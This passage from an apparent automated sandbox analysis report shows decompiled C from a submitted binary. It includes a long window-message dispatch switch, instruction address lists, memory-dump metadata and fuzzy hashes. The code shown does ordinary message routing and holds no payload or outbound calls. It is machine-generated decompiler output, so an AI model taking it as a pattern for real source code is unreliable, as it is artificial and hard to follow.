      											_push( *((intOrPtr*)( *(_t235 + 0x10) + 4)));
      											while(1) {
      												_t205 = E009AA764();
      												__eflags = _t205;
      												if(_t205 == 0) {
      													break;
      												}
      												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t235 + 8);
      												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t235 + 8)) {
      													( *(_t235 - 0x18))[1] = _t205;
      													E009AB846(_t235 - 0x14);
      													L113:
      													_t206 =  *((intOrPtr*)(_t205 + 0x14));
      													L114:
      													_push(_t234);
      													L115:
      													_push( *((intOrPtr*)(_t235 + 0xc)));
      													L116:
      													_t168 =  *_t206();
      													L117:
      													 *((intOrPtr*)(_t235 - 0x10)) = _t168;
      													goto L118;
      												}
      												_push(0);
      												_push(0);
      												_push(0xc000);
      												_t207 = _t205 + 0x18;
      												__eflags = _t207;
      												_push(_t207);
      											}
      											_t204 =  *(_t235 + 0x10);
      											L36:
      											_t204 =  *_t204();
      											 *(_t235 + 0x10) = _t204;
      											continue;
      										}
      										_push( *(_t235 + 8));
      										_push( *((intOrPtr*)(_t204 + 4)));
      										_t175 = E009AA764();
      										 *(_t235 + 0x10) = _t175;
      										__eflags = _t175;
      										if(_t175 == 0) {
      											goto L36;
      										}
      										( *(_t235 - 0x18))[1] = _t175;
      										E009AB846(_t235 - 0x14);
      										L29:
      										_t222 =  *((intOrPtr*)( *(_t235 + 0x10) + 0x10)) - 1;
      										__eflags = _t222 - 0x53;
      										if(__eflags > 0) {
      											goto L118;
      										}
      										switch( *((intOrPtr*)(_t222 * 4 +  &M009AF4C6))) {
      											case 0:
      												_push(E009BAD30(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
      												goto L44;
      											case 1:
      												_push( *(__ebp + 0xc));
      												goto L44;
      											case 2:
      												__eax = __esi;
      												__eax = __esi >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = __si & 0x0000ffff;
      												_push(__si & 0x0000ffff);
      												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
      												goto L50;
      											case 3:
      												_push(__esi);
      												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
      												goto L42;
      											case 4:
      												_push(__esi);
      												L44:
      												__ecx = __edi; // executed
      												__eax =  *__ebx(); // executed
      												goto L117;
      											case 5:
      												__ecx = __ebp - 0x28;
      												E009BA639(__ebp - 0x28) =  *(__esi + 4);
      												__ecx = __ebp - 0x9c;
      												 *((char*)(__ebp - 4)) = 1;
      												 *(__ebp - 0x24) =  *(__esi + 4);
      												__eax = E009AB862(__ecx, __edx, __eflags);
      												__eax =  *__esi;
      												__esi =  *(__esi + 8);
      												 *((char*)(__ebp - 4)) = 2;
      												 *(__ebp - 0x7c) = __eax;
      												__eax = E009AC937(__ebx, __ecx, __edx, __edi, __esi, __eflags, __eax);
      												__eflags = __eax;
      												if(__eax == 0) {
      													__eax =  *(__edi + 0x68);
      													__eflags = __eax;
      													if(__eax != 0) {
      														__ecx = __eax + 0x24;
      														__eax = E009C2BBF(__eax + 0x24, __edx,  *(__ebp - 0x7c));
      														__eflags = __eax;
      														if(__eax != 0) {
      															 *(__ebp - 0x30) = __eax;
      														}
      													}
      													__eax = __ebp - 0x9c;
      												}
      												_push(__esi);
      												_push(__eax);
      												__eax = __ebp - 0x28;
      												_push(__ebp - 0x28);
      												__ecx = __edi;
      												__eax =  *__ebx();
      												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
      												_t84 = __ebp - 0x7c;
      												 *_t84 =  *(__ebp - 0x7c) & 0x00000000;
      												__eflags =  *_t84;
      												__ecx = __ebp - 0x9c;
      												 *(__ebp - 0x10) = __ebp - 0x28;
      												 *((char*)(__ebp - 4)) = 1;
      												__eax = E009AD6CC(__ebx, __ebp - 0x9c, __edx, __edi, __esi,  *_t84);
      												goto L59;
      											case 6:
      												__ecx = __ebp - 0x28;
      												E009BA639(__ebp - 0x28) =  *(__esi + 4);
      												_push( *(__esi + 8));
      												 *(__ebp - 0x24) =  *(__esi + 4);
      												__eax = __ebp - 0x28;
      												_push(__ebp - 0x28);
      												__ecx = __edi;
      												 *((char*)(__ebp - 4)) = 3;
      												__eax =  *__ebx();
      												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
      												 *(__ebp - 0x10) = __ebp - 0x28;
      												L59:
      												__ecx = __ebp - 0x28;
      												 *((char*)(__ebp - 4)) = 0;
      												__eax = E009BADC5(__ecx);
      												goto L118;
      											case 7:
      												__eax =  *(__ebp + 0xc);
      												__eax =  *(__ebp + 0xc) >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
      												goto L62;
      											case 8:
      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
      												_push( *(__ebp + 0xc) >> 0x10);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												goto L42;
      											case 9:
      												goto L114;
      											case 0xa:
      												_push(E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi));
      												__eax =  *(__ebp + 0xc);
      												__eax =  *(__ebp + 0xc) >> 0x10;
      												L62:
      												_push(__eax);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												L50:
      												_push(__eax);
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L117;
      											case 0xb:
      												_push(__esi);
      												goto L110;
      											case 0xc:
      												_push( *(__ebp + 0xc));
      												goto L66;
      											case 0xd:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L118;
      											case 0xe:
      												__eax =  *(__ebp + 0xc);
      												__eax =  *(__ebp + 0xc) >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												goto L69;
      											case 0xf:
      												_push(__esi >> 0x10);
      												__eax = __si;
      												goto L69;
      											case 0x10:
      												__eax = __esi;
      												__eax = __esi >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = __si & 0x0000ffff;
      												goto L72;
      											case 0x11:
      												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
      												goto L48;
      											case 0x12:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L117;
      											case 0x13:
      												_push(E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc)));
      												_push(E009AC90B(__ebx, __ecx, __edx, __esi));
      												__eax = 0;
      												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
      												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
      												__eflags = _t112;
      												__eax = 0 | _t112;
      												goto L75;
      											case 0x14:
      												__eax = E009BAD30(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
      												goto L77;
      											case 0x15:
      												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
      												goto L77;
      											case 0x16:
      												__esi = __esi >> 0x10;
      												_push(__esi >> 0x10);
      												__eax = __si;
      												_push(__si);
      												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
      												goto L75;
      											case 0x17:
      												_push( *(__ebp + 0xc));
      												goto L81;
      											case 0x18:
      												_push(__esi);
      												L81:
      												__eax = E009AC90B(__ebx, __ecx, __edx);
      												L77:
      												_push(__eax);
      												goto L66;
      											case 0x19:
      												__eax = __esi;
      												__eax = __esi >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = __si & 0x0000ffff;
      												goto L84;
      											case 0x1a:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__ecx);
      												L84:
      												_push(__eax);
      												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
      												goto L75;
      											case 0x1b:
      												_push(__esi);
      												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
      												goto L69;
      											case 0x1c:
      												__eax =  *(__ebp + 0xc);
      												__eax =  *(__ebp + 0xc) >> 0x10;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
      												goto L88;
      											case 0x1d:
      												__ecx =  *(__ebp + 0xc);
      												__edx = __cx;
      												__ecx =  *(__ebp + 0xc) >> 0x10;
      												__ecx = __cx;
      												 *((intOrPtr*)(__ebp + 8)) = __edx;
      												 *(__ebp + 0xc) = __ecx;
      												__eflags = __eax - 0x2a;
      												if(__eax != 0x2a) {
      													_push(__ecx);
      													_push(__edx);
      													goto L111;
      												}
      												_push(E009AC90B(__ebx, __ecx, __edx, __esi));
      												_push( *(__ebp + 0xc));
      												_push( *((intOrPtr*)(__ebp + 8)));
      												goto L73;
      											case 0x1e:
      												_push(__esi);
      												L66:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L118;
      											case 0x1f:
      												_push(__esi);
      												_push( *(__ebp + 0xc));
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L2;
      											case 0x20:
      												__eax = __si;
      												__eflags = __esi;
      												__ecx = __si;
      												_push(__ecx);
      												L42:
      												_push(__eax);
      												goto L116;
      											case 0x21:
      												__eax =  *(__ebp + 0xc);
      												_push(__esi);
      												__eax =  *(__ebp + 0xc) >> 0x10;
      												L88:
      												_push(__eax);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												L75:
      												_push(__eax);
      												goto L73;
      											case 0x22:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__si);
      												L72:
      												_push(__eax);
      												_push( *(__ebp + 0xc));
      												L73:
      												__ecx = __edi; // executed
      												__eax =  *__ebx(); // executed
      												goto L118;
      											case 0x23:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__si);
      												_push(__si);
      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
      												_push( *(__ebp + 0xc) >> 0x10);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												_push( *(__ebp + 0xc) & 0x0000ffff);
      												__ecx = __edi;
      												__eax =  *__ebx();
      												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
      												L6:
      												__eflags = _t194;
      												if(_t194 != 0) {
      													goto L118;
      												}
      												goto L39;
      											case 0x24:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__si);
      												_push(__si);
      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
      												_push( *(__ebp + 0xc) >> 0x10);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												_push( *(__ebp + 0xc) & 0x0000ffff);
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L118;
      											case 0x25:
      												goto L118;
      											case 0x26:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												 *(__ebp - 0x10) = __eax;
      												__eflags = __eax;
      												if(__eax == 0) {
      													goto L118;
      												}
      												L39:
      												 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
      												E009AB846(_t235 - 0x14);
      												_t172 = 0;
      												__eflags = 0;
      												goto L40;
      											case 0x27:
      												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi);
      												L48:
      												_push(__eax);
      												L110:
      												_push( *(__ebp + 0xc));
      												goto L111;
      											case 0x28:
      												_push(E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi));
      												goto L115;
      											case 0x29:
      												_push(__esi);
      												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
      												goto L69;
      											case 0x2a:
      												__ecx = __si & 0x0000ffff;
      												_push(__si & 0x0000ffff);
      												__eax = __esi;
      												__eax = __esi >> 0x10;
      												__ecx = __eax;
      												__ecx = __eax & 0x0000f000;
      												_push(__ecx);
      												__eax = __eax & 0x00000fff;
      												__eflags = __eax;
      												_push(__eax);
      												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
      												goto L104;
      											case 0x2b:
      												__eax =  *(__ebp + 0xc) & 0x000000ff;
      												_push(__esi);
      												L69:
      												_push(__eax);
      												L111:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L118;
      											case 0x2c:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__si);
      												_push(__si);
      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
      												_push( *(__ebp + 0xc) >> 0x10);
      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
      												L104:
      												_push(__eax);
      												goto L105;
      											case 0x2d:
      												__eax = __si;
      												__esi = __esi >> 0x10;
      												__ecx = __si;
      												_push(__si);
      												_push(__si);
      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
      												_push( *(__ebp + 0xc) >> 0x10);
      												_push( *(__ebp + 0xc));
      												L105:
      												__ecx = __edi;
      												__eax =  *__ebx();
      												goto L2;
      										}
      									}
      									_t179 =  *(_t235 - 0x18);
      									_t58 =  &(_t179[1]);
      									 *_t58 = _t179[1] & 0x00000000;
      									__eflags =  *_t58;
      									E009AB846(_t235 - 0x14);
      									goto L39;
      								}
      								_t182 = _t203;
      								__eflags =  *(_t235 + 0x10) - _t182[2];
      								if( *(_t235 + 0x10) != _t182[2]) {
      									goto L25;
      								}
      								_t205 = _t182[1];
      								 *(_t235 + 0x10) = _t205;
      								E009AB846(_t235 - 0x14);
      								__eflags = _t205;
      								if(_t205 == 0) {
      									goto L39;
      								}
      								__eflags =  *(_t235 + 8) - 0xc000;
      								if( *(_t235 + 8) < 0xc000) {
      									goto L29;
      								}
      								goto L113;
      							}
      							__eflags =  *(_t156 + 0x74);
      							if( *(_t156 + 0x74) <= 0) {
      								goto L20;
      							}
      							__eflags = _t198 - 0x200;
      							if(_t198 < 0x200) {
      								L16:
      								__eflags = _t198 - 0x100;
      								if(_t198 < 0x100) {
      									L18:
      									__eflags = _t198 - 0x281 - 0x10;
      									if(_t198 - 0x281 > 0x10) {
      										goto L20;
      									}
      									L19:
      									_t186 =  *((intOrPtr*)( *( *(_t232 + 0x68)) + 0x94))(_t198,  *((intOrPtr*)(_t235 + 0xc)), _t234, _t235 - 0x10);
      									__eflags = _t186;
      									if(_t186 != 0) {
      										goto L118;
      									}
      									goto L20;
      								}
      								__eflags = _t198 - 0x10f;
      								if(_t198 <= 0x10f) {
      									goto L19;
      								}
      								goto L18;
      							}
      							__eflags = _t198 - 0x209;
      							if(_t198 <= 0x209) {
      								goto L19;
      							}
      							goto L16;
      						} else {
      							_t190 = E009AE919(_t198, _t228, _t232, _t232, _t234, _t234 >> 0x10);
      							__eflags = _t190;
      							if(_t190 != 0) {
      								L2:
      								 *((intOrPtr*)(_t235 - 0x10)) = 1;
      								L118:
      								_t169 =  *((intOrPtr*)(_t235 + 0x14));
      								if(_t169 != 0) {
      									 *_t169 =  *((intOrPtr*)(_t235 - 0x10));
      								}
      								 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
      								E009AB846(_t235 - 0x14);
      								_t172 = 1;
      								L40:
      								return E00AAD30A(_t172);
      							}
      							goto L12;
      						}
      					}
      					_t226 =  *(_t235 + 0x10);
      					__eflags =  *_t226;
      					if( *_t226 == 0) {
      						goto L39;
      					}
      					_push(_t235 - 0x10);
      					_push(_t226);
      					_push( *((intOrPtr*)(_t235 + 0xc)));
      					_t194 =  *((intOrPtr*)( *__ecx + 0xf8))();
      					goto L6;
      				}
      				_push( *(_t235 + 0x10));
      				_push( *((intOrPtr*)(_t235 + 0xc)));
      				if( *((intOrPtr*)( *__ecx + 0xf4))() == 0) {
      					goto L39;
      				}
      				goto L2;
      			}
      Instruction addresses:
      0x009aeef6 0x009aeef6 0x009aef00 0x009aef05 0x009aef09 0x009aef0c 0x009aef13 0x009aef16
      0x009aef1f 0x009aef43 0x009aef46 0x009aef72 0x009aef75 0x009aef78 0x009aef85 0x009aef85
      0x009aef8a 0x009aef8d 0x009aefa3 0x009aefa3 0x009aefa6 0x009aefa8 0x009aeff7 0x009aeffb
      0x009af008 0x009af011 0x009af01c 0x009af022 0x009af025 0x009af027 0x009af057 0x009af057
      0x009af05a 0x009af060 0x009af062 0x009af0f1 0x009af0f1 0x009af0f4 0x00000000 0x00000000
      0x009af06a 0x009af071 0x009af073 0x009af075 0x009af0b9 0x009af0be 0x009af0dc 0x009af0e1
      0x009af0e3 0x009af0e5 0x00000000 0x00000000 0x009af0c7 0x009af0c9 0x009af48e 0x009af491
      0x009af496 0x009af496 0x009af499 0x009af499 0x009af49a 0x009af49a 0x009af49d 0x009af49f
      0x009af4a1 0x009af4a1 0x00000000 0x009af4a1 0x009af0cf 0x009af0d1 0x009af0d3 0x009af0d8
      0x009af0d8 0x009af0db 0x009af0db 0x009af0e7 0x009af0ea 0x009af0ec 0x009af0ee 0x00000000
      0x009af0ee 0x009af077 0x009af07a 0x009af07d 0x009af082 0x009af085 0x009af087 0x00000000
      0x00000000 0x009af08c 0x009af092 0x009af097 0x009af0a0 0x009af0a3 0x009af0a6 0x00000000
      0x00000000 0x009af0ac 0x00000000 0x009af137 0x00000000 0x00000000 0x009af141 0x00000000
      0x00000000 0x009af15b 0x009af15d 0x009af15d 0x009af160 0x009af161 0x009af164 0x009af168
      0x00000000 0x00000000 0x009af177 0x009af17b 0x00000000 0x00000000 0x009af182 0x009af138
      0x009af138 0x009af13a 0x00000000 0x00000000 0x009af185 0x009af18d 0x009af190 0x009af196
      0x009af19a 0x009af19d 0x009af1a2 0x009af1a4 0x009af1a8 0x009af1ac 0x009af1af 0x009af1b4
      0x009af1b6 0x009af1b8 0x009af1bb 0x009af1bd 0x009af1c2 0x009af1c5 0x009af1ca 0x009af1cc
      0x009af1ce 0x009af1ce 0x009af1cc 0x009af1d1 0x009af1d1 0x009af1d7 0x009af1d8 0x009af1d9
      0x009af1dc 0x009af1dd 0x009af1df 0x009af1e1 0x009af1e5 0x009af1e5 0x009af1e5 0x009af1e9
      0x009af1ef 0x009af1f2 0x009af1f6 0x00000000 0x00000000 0x009af20c 0x009af214 0x009af217
      0x009af21a 0x009af21d 0x009af220 0x009af221 0x009af223 0x009af227 0x009af229 0x009af22d
      0x009af1fb 0x009af1fb 0x009af1fe 0x009af202 0x00000000 0x00000000 0x009af232 0x009af235
      0x009af235 0x009af238 0x009af23a 0x00000000 0x00000000 0x009af24c 0x009af24f 0x009af250
      0x00000000 0x00000000 0x00000000 0x00000000 0x009af25f 0x009af260 0x009af263 0x009af23f
      0x009af23f 0x009af240 0x009af16d 0x009af16d 0x009af16e 0x009af170 0x00000000 0x00000000
      0x009af47e 0x00000000 0x00000000 0x009af268 0x00000000 0x00000000 0x009af274 0x009af276
      0x00000000 0x00000000 0x009af27d 0x009af280 0x009af280 0x009af283 0x009af284 0x00000000
      0x00000000 0x009af294 0x009af295 0x00000000 0x00000000 0x009af29a 0x009af29c 0x009af29c
      0x009af29f 0x009af2a0 0x00000000 0x00000000 0x009af150 0x00000000 0x00000000 0x009af146
      0x009af148 0x00000000 0x00000000 0x009af2b8 0x009af2bf 0x009af2c0 0x009af2c2 0x009af2c5
      0x009af2c5 0x009af2c5 0x00000000 0x00000000 0x009af2ce 0x00000000 0x00000000 0x009af2d9
      0x00000000 0x00000000 0x009af2e2 0x009af2e6 0x009af2e7 0x009af2ea 0x009af2ee 0x00000000
      0x00000000 0x009af2f5 0x00000000 0x00000000 0x009af2ff 0x009af2f8 0x009af2f8 0x009af2d3
      0x009af2d3 0x00000000 0x00000000 0x009af302 0x009af304 0x009af304 0x009af307 0x009af308
      0x00000000 0x00000000 0x009af316 0x009af319 0x009af31c 0x009af31f 0x009af30b 0x009af30b
      0x009af30f 0x00000000 0x00000000 0x009af322 0x009af326 0x00000000 0x00000000 0x009af330
      0x009af333 0x009af333 0x009af336 0x009af338 0x00000000 0x00000000 0x009af344 0x009af347
      0x009af34a 0x009af34d 0x009af350 0x009af353 0x009af356 0x009af359 0x009af36d 0x009af36e
      0x00000000 0x009af36e 0x009af361 0x009af362 0x009af365 0x00000000 0x00000000 0x009af374
      0x009af26b 0x009af26b 0x009af26d 0x00000000 0x00000000 0x009af37a 0x009af37b 0x009af37e
      0x009af380 0x00000000 0x00000000 0x009af11f 0x009af122 0x009af125 0x009af128 0x009af129
      0x009af129 0x00000000 0x00000000 0x009af387 0x009af38a 0x009af38b 0x009af33d 0x009af33d
      0x009af33e 0x009af2c8 0x009af2c8 0x00000000 0x00000000 0x009af390 0x009af393 0x009af396
      0x009af399 0x009af2a3 0x009af2a3 0x009af2a4 0x009af2a7 0x009af2a7 0x009af2a9 0x00000000
      0x00000000 0x009af39f 0x009af3a2 0x009af3a5 0x009af3a8 0x009af3a9 0x009af3ad 0x009af3b0
      0x009af3b1 0x009af3b5 0x009af3b6 0x009af3b8 0x009af3ba 0x009aef65 0x009aef65 0x009aef67
      0x00000000 0x00000000 0x00000000 0x00000000 0x009af3c2 0x009af3c5 0x009af3c8 0x009af3cb
      0x009af3cc 0x009af3d0 0x009af3d3 0x009af3d4 0x009af3d8 0x009af3d9 0x009af3db 0x00000000
      0x00000000 0x00000000 0x00000000 0x009af3e2 0x009af3e4 0x009af3e6 0x009af3e9 0x009af3eb
      0x00000000 0x00000000 0x009af109 0x009af109 0x009af110 0x009af115 0x009af115 0x00000000
      0x00000000 0x009af3f7 0x009af155 0x009af155 0x009af47f 0x009af47f 0x00000000 0x00000000
      0x009af407 0x00000000 0x00000000 0x009af40d 0x009af411 0x00000000 0x00000000 0x009af41b
      0x009af41e 0x009af41f 0x009af421 0x009af424 0x009af426 0x009af42c 0x009af42d 0x009af42d
      0x009af432 0x009af436 0x00000000 0x00000000 0x009af445 0x009af449 0x009af288 0x009af288
      0x009af482 0x009af482 0x009af484 0x00000000 0x00000000 0x009af44f 0x009af452 0x009af455
      0x009af458 0x009af459 0x009af45d 0x009af460 0x009af461 0x009af43b 0x009af43b 0x00000000
      0x00000000 0x009af467 0x009af46a 0x009af46d 0x009af470 0x009af471 0x009af475 0x009af478
      0x009af479 0x009af43c 0x009af43c 0x009af43e 0x00000000 0x00000000 0x009af0ac 0x009af0fa
      0x009af0fd 0x009af0fd 0x009af0fd 0x009af104 0x00000000 0x009af104 0x009af02c 0x009af02e
      0x009af031 0x00000000 0x00000000 0x009af033
      0x009af039
      0x009af03c
      0x009af041
      0x009af043
      0x00000000
      0x00000000
      0x009af049
      0x009af050
      0x00000000
      0x00000000
      0x00000000
      0x009af052
      0x009aefaa
      0x009aefae
      0x00000000
      0x00000000
      0x009aefb0
      0x009aefb6
      0x009aefc0
      0x009aefc0
      0x009aefc6
      0x009aefd0
      0x009aefd6
      0x009aefd9
      0x00000000
      0x00000000
      0x009aefdb
      0x009aefe9
      0x009aefef
      0x009aeff1
      0x00000000
      0x00000000
      0x00000000
      0x009aeff1
      0x009aefc8
      0x009aefce
      0x00000000
      0x00000000
      0x00000000
      0x009aefce
      0x009aefb8
      0x009aefbe
      0x00000000
      0x00000000
      0x00000000
      0x009aef8f
      0x009aef9a
      0x009aef9f
      0x009aefa1
      0x009aef37
      0x009aef37
      0x009af4a4
      0x009af4a4
      0x009af4a9
      0x009af4ae
      0x009af4ae
      0x009af4b0
      0x009af4b7
      0x009af4be
      0x009af117
      0x009af11c
      0x009af11c
      0x00000000
      0x009aefa1
      0x009aef8d
      0x009aef48
      0x009aef4b
      0x009aef4d
      0x00000000
      0x00000000
      0x009aef58
      0x009aef59
      0x009aef5a
      0x009aef5f
      0x00000000
      0x009aef5f
      0x009aef21
      0x009aef26
      0x009aef31
      0x00000000
      0x00000000
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 1309b4d588f64a198a6a5067960b9966944cdc2a9988f31da65e463e0a7186de
      • Instruction ID: ee9d6c21e74b12343478975dcff6ef389cb13b1001ea89159e4343ef240d74d9
      • Opcode Fuzzy Hash: 1309b4d588f64a198a6a5067960b9966944cdc2a9988f31da65e463e0a7186de
      • Instruction Fuzzy Hash: 24B15E70A0020ADFDF14DFA4C9D4BAE7BB8EF4A314F108469F8159B292D735DA41DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E009B528B(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t67;
      				void* _t73;
      				intOrPtr* _t76;
      				signed int _t92;
      				signed int _t97;
      				signed int _t106;
      				void* _t107;
      				void* _t131;
      				intOrPtr* _t133;
      				intOrPtr* _t135;
      				void* _t136;
      
      				_t131 = __edx;
      				_push(0xc);
      				E00AAD232(0xac8442, __ebx, __edi, __esi);
      				_t133 = __ecx;
      				_t135 =  *((intOrPtr*)(__ecx + 0x88));
      				_t106 = 0;
      				 *((intOrPtr*)(_t136 - 0x10)) = 0;
      				 *((intOrPtr*)(_t136 - 0x14)) = 0;
      				if(_t135 == 0) {
      					_t135 =  *((intOrPtr*)( *__ecx + 0x6c))();
      					 *((intOrPtr*)(_t136 - 0x14)) = 1;
      					L6:
      					__eflags = _t135 - _t106;
      					if(__eflags != 0) {
      						__eflags =  *((intOrPtr*)(_t136 - 0x10)) - _t106;
      						if( *((intOrPtr*)(_t136 - 0x10)) != _t106) {
      							L12:
      							__eflags =  *((intOrPtr*)(_t136 + 8)) - _t106;
      							if(__eflags != 0) {
      								E009B0648( *((intOrPtr*)(E009BD77F(_t106, _t133, _t135, __eflags) + 4)));
      								 *(_t136 - 4) = _t106;
      								_t107 =  *((intOrPtr*)( *_t135 + 0x60))();
      								 *((intOrPtr*)( *_t135 + 0x64))(0);
      								_t67 =  *((intOrPtr*)( *_t135 + 0x7c))( *((intOrPtr*)(_t136 + 8)));
      								__eflags = _t67;
      								if(__eflags != 0) {
      									 *((intOrPtr*)( *_t135 + 0x58))( *((intOrPtr*)(_t136 + 8)),  *((intOrPtr*)(_t136 + 0xc)));
      									 *((intOrPtr*)( *_t135 + 0xd0))(1);
      									 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
      									E009AF81E(_t107, _t136 + 0xb, _t133, _t135, __eflags);
      									_t106 = 0;
      									__eflags = 0;
      									L26:
      									_t73 = E009B2B03();
      									__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t106;
      									if( *((intOrPtr*)(_t136 - 0x14)) != _t106) {
      										__eflags =  *((intOrPtr*)(_t73 + 0x20)) - _t106;
      										if( *((intOrPtr*)(_t73 + 0x20)) == _t106) {
      											 *((intOrPtr*)(_t73 + 0x20)) =  *((intOrPtr*)(_t136 - 0x10));
      										}
      									}
      									 *((intOrPtr*)( *_t133 + 0x74))( *((intOrPtr*)(_t136 - 0x10)), _t135,  *((intOrPtr*)(_t136 + 0x10)));
      									_t76 = _t135;
      									L30:
      									return E00AAD30A(_t76);
      								}
      								__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t67;
      								if(__eflags == 0) {
      									__eflags =  *((intOrPtr*)( *_t135 + 0x60))();
      									if(__eflags != 0) {
      										 *((intOrPtr*)( *_t133 + 0x88))(_t135);
      										 *((intOrPtr*)( *_t135 + 0x78))();
      									} else {
      										 *((intOrPtr*)( *_t135 + 0x64))(_t107);
      									}
      								} else {
      									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 - 0x10)))) + 0x60))();
      								}
      								 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
      								E009AF81E(_t107, _t136 + 0xb, _t133, _t135, __eflags);
      								L3:
      								_t76 = 0;
      								goto L30;
      							}
      							 *((intOrPtr*)( *_t133 + 0x88))(_t135);
      							__eflags =  *((intOrPtr*)(_t136 + 0x10)) - _t106;
      							if( *((intOrPtr*)(_t136 + 0x10)) == _t106) {
      								 *((intOrPtr*)(_t135 + 0xa0)) = 1;
      							}
      							_t92 =  *((intOrPtr*)( *_t135 + 0x78))();
      							__eflags = _t92;
      							if(_t92 != 0) {
      								goto L26;
      							} else {
      								__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t106;
      								if( *((intOrPtr*)(_t136 - 0x14)) != _t106) {
      									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 - 0x10)))) + 0x60))();
      								}
      								goto L3;
      							}
      						}
      						 *(_t135 + 0x9c) =  *(_t135 + 0x9c) & _t106;
      						 *(_t136 - 0x18) =  *(_t135 + 0x9c);
      						_t97 =  *((intOrPtr*)( *_t133 + 0x70))(_t135, 0);
      						 *((intOrPtr*)(_t136 - 0x10)) = _t97;
